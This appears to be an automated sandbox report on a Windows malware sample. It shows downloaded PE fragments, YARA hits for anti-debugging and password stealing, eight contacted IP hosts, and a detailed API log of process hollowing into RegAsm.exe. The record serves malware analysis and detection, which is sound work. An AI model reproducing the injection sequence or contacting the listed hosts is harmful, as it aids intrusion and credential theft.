buffer: MZÿÿ¸@躴 Í!¸LÍ!This program cannot be run in DOS mode. $ؔ˜vú˜œvú˜œvú˜!9l˜vú˜‚$~˜†vú˜‚$o˜Œvú˜‚$y˜ÿvú˜»°˜›vú˜œvû˜vú˜‚$p˜vú˜‚$n˜vú˜‚$k˜vú˜Richœvú˜PELÆ?eà  p€@½¯€¼˜P`€(ˆ”€Ä.textnp `.rdata #€$t@@.dataÀ°˜@À.tlsP°@À.rsrc€(`*¶@@; °AuóÃéj hÀ”AèA‹u…ötuƒ= @QuCjè3 YƒeüVè[ Y‰Eä…Àt VPè| YYÇEüþÿÿÿè ƒ}äu7ÿuë jè YÃVjÿ5DËAÿ̀A…Àuèê‹ðÿ`€AP蚉YèËÿU‹ìQƒeüVEüPÿu ÿuè•‹ðƒÄ …öu9Eüt覅Àt 蝋Mü‰‹Æ^ÉËÿU‹ìj jÿuè2ƒÄ ]ËÿU‹ì]éßÿÿÿj hà”AèR3ÿ‰}ä3À‹u;÷•À;Çu èNÇWWWWWè¶!ƒÄƒÈÿé´VèßY‰}üöF @uwVè, Yƒøÿtƒøþt‹ÐÁú‹ÈƒáÁá •`/Që¹(µAöA$u)ƒøÿtƒøþt‹ÈÁùƒàÁà`/Që¸(µAö@$€tèÃÇWWWWWè+!ƒÄƒMäÿ9}äuÿNx ‹¶A‰ëVè"Y‰EäÇEüþÿÿÿè ‹Eäè«ËuVè•YËÿU‹ìQSVWÿ5°@Qès!ÿ5¬@Q‹ø‰}üèc!‹ðYY;÷‚ƒ‹Þ+ߍCƒørwWèF'‹øCY;øsH¸;øs‹ÇÇ;ÇrPÿuüèÔ&YY…ÀuG;Çr@Pÿuüè¾&YY…Àt1ÁûP4˜è~ Y£°@Qÿuèp ‰ƒÆVèe Y£¬@Q‹EYë3À_^[ÉËÿVjj è(&‹ðVè> ƒÄ £°@Q£¬@Q…öujX^Ã&3À^Ãj h•AècèރeüÿuèøþÿÿY‰EäÇEüþÿÿÿè ‹EäèÃè½Ã‹ÿU‹ìÿuè·ÿÿÿ÷ØÀ÷ØYH]ËÿU‹ìW¿èWÿЀAÿuÿ$€AÇèÿ`êw…ÀtÞ_]ËÿU‹ìè^(ÿuè«&ÿ5°AèühÿÿÐƒÄ ]ËÿU‹ìh‚Aÿ$€A…Àth‚APÿd€A…ÀtÿuÿÐ]ËÿU‹ìÿuèÈÿÿÿYÿuÿԀAÌjè‚YÃjèŸYËÿU‹ìV‹ðë ‹…ÀtÿÐ
request_handle: 0x00cc008c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL|Vófà  >= @@ €`…è<S@È((&` °;  H.textD  `.rsrcÈ@ @@.reloc `&@B =HÈ*è¡ÿŅ쐑&l{ÕEiû „; ÈÔ>2Bþ\WŒ”cãd©Iê®BÅ7<F÷ݍÕu/ «ä)”•ˆÎþìs¬|—QŸQ§'|TQÞ ÷Où}røê{™–&X†ëë5½s3ÿñÿ~­ñ®a³a<ABMî7(ÆspTS&¾DtŒž}}݀¨fµRfF³eMŸí&33ÃÇèhF˜ªøy ÂiÝæÙ@û*Õtf#NÝwv­)þøĝz €õfÿŒc‹äfPNoJ²X:§¾ŠE¤ÑiO“ÝüèšuLJUO&1ªïleKI×'܆0Ø_L³Öhɛ J‰XÀ³}Ùb 9ïƒ{fp å÷ê\“Ľb—ÏÚëP>8K+bjçÛóéFÞM”mp˜ “eÑWÛq_ ~wT€¨žò^+åÉc×i¿<O=uØËóO,?«·¯«ÓL\‚ŽJq.ÜܬŒ¿‡¯DÁdüc‰·|鞎0Õ§cVJž8Á:9’0Põo¶T+æÄó%ø6A~·ËÏÉñ-àޑٟ"Óîkóíú|Ü ?m¬rU´«á‡~!ÂAºH³îíU¯1©fÝ+–mìD¶ó|ÿ¦ð×4ÉðlR¨õuÓÆ 'TîG‘À˜ÜªDغÜôg÷{yÞIµù?òš‰Pâ<:ˆ¬0-^ÿ6»÷ÑÊ<ž$}<ø;¾‚B1Ï*ÂØígôQ» ¸© Š³þ!0Y÷aPØ{ñHŒššqâòß}¡Ï ïHUWèí9 €;ÏM„!Yqͬ߉¡±(Úˆ·ë&Š*¼Û u³ôÈt@:år$ä‚6”ĺ,:¸ï J„U՗ÙЃܿóÆ@º¥G_@‰3¢°–µB—Û©vº™\"F$²Oóä`|xýñ(ìháÉzØf<ì7ç<¾W„(åòB/ê:­áü‹õk¸Â³vÑHcѸø܄ ²1ìJ™%¡üû¯uã#jæÄtw$Zb•Ê™G¡î½R]´klŸä`Ð}¬QqÞK“yîäÎ Úm‘L{@!•n˦üo1ìG””9}X€««^bmŒ@5âiûw•ö°‚bš½Yȏ`2_)<Ò®ïOŽ‚¿kªÄŒNP2êbz´7|o@¹F««L·ìŽ’š£%ÐT29¹Ï—""•‰aºõµÖe8©çã̏»Óñü¨ Ÿ%¾šcuÊû⢒¿Û*»V]K„na)nM|:“VY‹,[°ö––q²j(ûxüÓŠ2úXZL-7vù,µ·¨ŒÔ¨ƒq:¬|ʸªu0 fo ֞Ï$ÍÃéLS°/0GëÑý„×”ë3å„ÚP”T– ¯V%ò{ÿ³Ù•6Bº–œë ÚêÑŽOsŸ#UëgkUÛ8bíj4)<I4„…èeçãw¸|eò¿ ½Ùzëã&Jx)~õkZaéÜױhÙ@;QÓO[Êð:³€™Xú8¶KÐÜׇÉMOñDø¹¶ü³te³Ç‰âzÚ(:sÜô aå[&[£,k¶íµÞ#s„̺ô­§Ï0ç•u³Èî辯©ö¾VH? ¤e°,\§_}¦ÐåË)ÂrhãÚøÓ±ÅÖhÊí ‡1 ‹ÕÀÐYZ[›ö}„±Ã|[P”4›ñHÚȳ€†¸.êñ#ƒJw¾ªÍuâ·½’B×ÓW#3ÄÉw:«U¦î$+WÿTþÑ.%µÌÝæÓߐª~¤é =Xñrq癓¡™ ùdøo¨¬Okö—˜#ç ^ ±p(æ¦ eŽÑWŸà'¿déË9š'1܁@r’#/«JùÑ´ßr³ ѨMC  $žäbÀøŽSòÄ#æ2 º…?{fìmäI¦OD¢Fû9ÿ6ò}[
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL1‹¨¾à /B.!/ @/@ À1@…à /K`/4 1 ž /  H.text4/ / `.sdata®@/ /@À.rsrc4`/6/@@.reloc  1F1@B!/H iª7JÊ  Ô$(l*(l******(l*****(l*0Ò(l 8:s €s € 8s €8a þþ ECCM¿ÿÿÿ¡ÿÿÿ/c (9Ìÿÿÿ&( ((9.& 8¬ÿÿÿs € 8˜ÿÿÿs €8mÿÿÿ& (9yÿÿÿ&*0*0*0*0*0***0*0**0****(l*~(l( s?(At € **0*****0****(l*0 + (r¯*_š&-ù(N:ø& (N9Â& 0u(= 8¬ÐU($ Ú(b B(brp(> (?  %¢% P(b(? Z(b Ö(b~@ (> (A ¢%ŒW¢% % æ(b¢¢ (L(3 8. þþ Eÿÿÿÿÿÿ3ÿÿÿ7û82& 8Ïÿÿÿ
request_handle: 0x00cc009c
1 1 0
section {u'size_of_data': u'0x0052ba00', u'virtual_address': u'0x00002000', u'entropy': 7.708126653827309, u'name': u'.text', u'virtual_size': u'0x0052b9c4'} entropy 7.70812665383 description A section with a high entropy has been found
section {u'size_of_data': u'0x0055f800', u'virtual_address': u'0x00530000', u'entropy': 7.993274364764354, u'name': u'.rsrc', u'virtual_size': u'0x0055f75e'} entropy 7.99327436476 description A section with a high entropy has been found
entropy 0.999722209362 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url http://www.winimage.com/zLibDll
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
buffer Buffer with sha1: 496453b90921b2f466df5740285cb4eb6ebe5186
buffer Buffer with sha1: 3e3c4130a7ca5eb80bcbac072cf67660e81cb017
buffer Buffer with sha1: c3ac794395ec68f9ff8fa76fb941e7c2a625f2f8
host 147.45.44.104
host 147.45.45.69
host 176.111.174.109
host 176.113.115.33
host 185.215.113.37
host 194.116.215.195
host 45.91.200.135
host 80.66.75.114
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000248
1 0 0
wmi Select * From AntiVirusProduct
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ù©} ½Èó½Èó½Èóö°ò¬Èóö°òvÈóö°ò¥ÈóIîó¹ÈóIòÜÈóIò¨ÈóIò¤Èóö°ò°Èó½Èó|ÈóNJòýÈóNJìó¼Èó½È„ó¼ÈóNJò¼ÈóRich½ÈóPELªyêfà '¨2OôÀ@@€d£Œ0V4yP&8À&%@À .texț¨ `.rdata0ïÀð¬@@.datahp°Jœ@À.rsrcV0Væ@@.reloc4yz<@B
base_address: 0x00400000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2528
process_handle: 0x00000248
1 1 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ù©} ½Èó½Èó½Èóö°ò¬Èóö°òvÈóö°ò¥ÈóIîó¹ÈóIòÜÈóIò¨ÈóIò¤Èóö°ò°Èó½Èó|ÈóNJòýÈóNJìó¼Èó½È„ó¼ÈóNJò¼ÈóRich½ÈóPELªyêfà '¨2OôÀ@@€d£Œ0V4yP&8À&%@À .texț¨ `.rdata0ïÀð¬@@.datahp°Jœ@À.rsrcV0Væ@@.reloc4yz<@B
base_address: 0x00400000
process_identifier: 2528
process_handle: 0x00000248
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob
Process injection Process 1740 called NtSetContextThread to modify thread in remote process 2528
Time & API Arguments Status Return Repeated

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5502031
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000244
process_identifier: 2528
1 0 0
Process injection Process 1740 resumed a thread in remote process 2528
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2528
1 0 0
Time & API Arguments Status Return Repeated

NtResumeThread

thread_handle: 0x000000dc
suspend_count: 1
process_identifier: 1740
1 0 0

NtResumeThread

thread_handle: 0x00000154
suspend_count: 1
process_identifier: 1740
1 0 0

NtResumeThread

thread_handle: 0x00000190
suspend_count: 1
process_identifier: 1740
1 0 0

NtResumeThread

thread_handle: 0x00000230
suspend_count: 1
process_identifier: 1740
1 0 0

CreateProcessInternalW

thread_identifier: 2532
thread_handle: 0x00000244
process_identifier: 2528
current_directory:
filepath: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
track: 1
command_line:
filepath_r: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
stack_pivoted: 0
creation_flags: 134217732 (CREATE_NO_WINDOW|CREATE_SUSPENDED)
inherit_handles: 0
process_handle: 0x00000248
1 1 0

NtGetContextThread

thread_handle: 0x00000244
1 0 0

NtAllocateVirtualMemory

process_identifier: 2528
region_size: 1970176
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x00000248
1 0 0

WriteProcessMemory

buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $ù©} ½Èó½Èó½Èóö°ò¬Èóö°òvÈóö°ò¥ÈóIîó¹ÈóIòÜÈóIò¨ÈóIò¤Èóö°ò°Èó½Èó|ÈóNJòýÈóNJìó¼Èó½È„ó¼ÈóNJò¼ÈóRich½ÈóPELªyêfà '¨2OôÀ@@€d£Œ0V4yP&8À&%@À .texț¨ `.rdata0ïÀð¬@@.datahp°Jœ@À.rsrcV0Væ@@.reloc4yz<@B
base_address: 0x00400000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00401000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0056c000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x0058b000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x00593000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer:
base_address: 0x005d9000
process_identifier: 2528
process_handle: 0x00000248
1 1 0

WriteProcessMemory

buffer: @
base_address: 0x7efde008
process_identifier: 2528
process_handle: 0x00000248
1 1 0

NtSetContextThread

registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 5502031
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x00000244
process_identifier: 2528
1 0 0

NtResumeThread

thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2528
1 0 0

NtResumeThread

thread_handle: 0x00000150
suspend_count: 1
process_identifier: 2528
1 0 0